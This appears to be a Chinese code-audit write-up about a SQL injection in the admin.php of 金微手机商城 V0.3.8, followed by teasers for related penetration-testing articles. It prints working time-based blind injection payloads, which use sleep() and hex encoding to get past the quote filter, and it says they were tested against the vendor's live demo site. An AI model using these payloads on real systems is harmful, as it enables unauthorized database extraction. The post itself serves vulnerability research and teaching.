记一次简单的审计

前言

上次在逛先知的时候,无意间看到了L4zily师傅的这篇文章:https://xz.aliyun.com/t/9114 ,所以有了这篇,该版本为金微手机商城 V0.3.8版本

正题

我们直接去官方搭建的演示站,直接访问/admin.php

我们先看Jms_0.3.8\admin.php的源码:

这里的第8行是传入数据给$m,然后当$m不为空时,会触发Jms_0.3.8\common.php的Dec函数,其功能主要是对传入的数据json解码:

但是这里return时,会因为$c为true而去触发Jms_0.3.8\common.php的Rpl函数,其内容为:

这里是进行了过滤,过滤的主要是一些不可显示的字符和\ * ' " % 空格
然后进行判断,当$m[“act”]不为idx或者是lgn时会进入if判断,然后回执行sql语句,首先先看这段sql语句:

我们可以看到我们可以对$m[“uid”]进行处理来进行sql注入,然后再来看Jms_0.3.8\common.php的Qry函数:

功能只是执行语句,没有其它的过滤,所以重新回到注入点

我们可以直接去主站的演示站进行这样构造:POST传入: {"act":"f1hgb","uid":"213123213121||sleep(5)"}

可以看到进行了延时,然后因为是或,所以会有几个数据表就会延时多少次5秒,所以这里显示的是10秒。
然后因为没有对sql的关键字进行过滤,所以我们可以直接进行时间盲注,因为过滤了引号,所以使用16进制,所以先测试第一个字母为j其16进制为0x6a,其paylaod: {"act":"f1hgb","uid":"213123213121||(if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),1,1)=0x6a,sleep(5),1))"}

发现是存正延时的,当我们换成第一个字母为k,其16进制为0x6b时,payload: {"act":"f1hgb","uid":"213123213121||(if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),1,1)=0x6b,sleep(5),1))"}

发现就没有延时。后面只需要替换table_name等就可以进行sql注入获取用户名等。

本文来源于: https://xz.aliyun.com/t/9367

相关推荐

记一次无意的渗透测试

由于最近再写一个web漏洞扫描器,准备在fofa上找网站测试的时候,无意间看到了个标题,xx系统, 点进去一看,好家伙,这不就是我很收悉的,那个xxcms嘛(具体的忘记了) 正好通过这个网站的cms漏洞,测试下我的扫描器,结果,好家伙,

ThinkPHP5.x RCE 复现

ThinkPHP5.x RCE 复现 其实去年开始是复现过这个漏洞的,但是总觉得并没有吃透,分析写得漏洞百出,于是再来审计一遍。 漏洞影响范围 5.x < 5.1.31 5.x < 5.0.23 复现环境 php7.3 thinkphp5.

FastAdmin前台文件上传

漏洞通告 FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。 2021年3月28日,360漏洞云漏洞研究员发现,FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件

draytek漏洞分析

分析复现一下几个draytek的漏洞 1.CVE-2020-8515 漏洞描述如下: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta,

ELK在渗透测试中的利用与安全配置解析

通过此文章,我将提供有关ELK在攻击利用与安全防护。关于利用ELK 的信息在网上非常罕见。因此,这篇文章只是本人在日常工作和学习中的个人笔记,虽不完善,但可作为学习参考。通过这篇文章希望能为你提供一些在渗透测试期间可能有用的方法。 背景 E

TP5 漏洞分析

RCE1 影响版本 TP 5.0.7 - 5.0.24 TP 5.1.0 - 5.1.30 payload 5.0 ?s=index/think\config/get&name=database.username // 获取配置信息 ?s=

记一次SSRF->getshell

这个是2个月前的项目,思路也是挺简单的,还是给兄弟们分享分享,首先还是常规的站点,我们进去看看 可以看见这个网站为thinkphp,当然,当时就很开心,因为自己打tp的站打的太多了,然后再进一步细看。 我们可以得知这个web站点的版本为

vulnstack红队一学习

环境搭建 配置网卡 编辑->虚拟网络编辑器 自定义为仅主机模式 配置win7网络 添加两块网卡,一块为VMnet1(仅主机模式),一块为VMnet8(net模式连通外网) 配置VMnet1网卡 (win7) DNS服务器是windows s

Hvv前排查分析

排查分析 这段时间陆陆续续开始hvv,而这里就简单的介绍一下hvv中对应急响应中可能存在问题进行介绍和分析。 windows排查分析 开机启动项 一般情况下,各个木马等恶意程序,都会在计算机开机的时候自动运行。 所以我们就需要排查一下win

内网渗透--对不出网目标的打法

文章简介 这篇文章使用红日渗透靶场(一)来进行练习对内网不出网机器的渗透,在这里感谢师傅们提供了现成的靶场环境,供我们小白来进行学习和练习。这个靶场设计的比较简单,但是通过这个靶场环境,采用多种手段进行渗透,可以使自己在没有那么多授权的真实

记一次完整的内网渗透经历

故事的起因比较简单,用三个字来概括吧:闲得慌。 因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。 简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很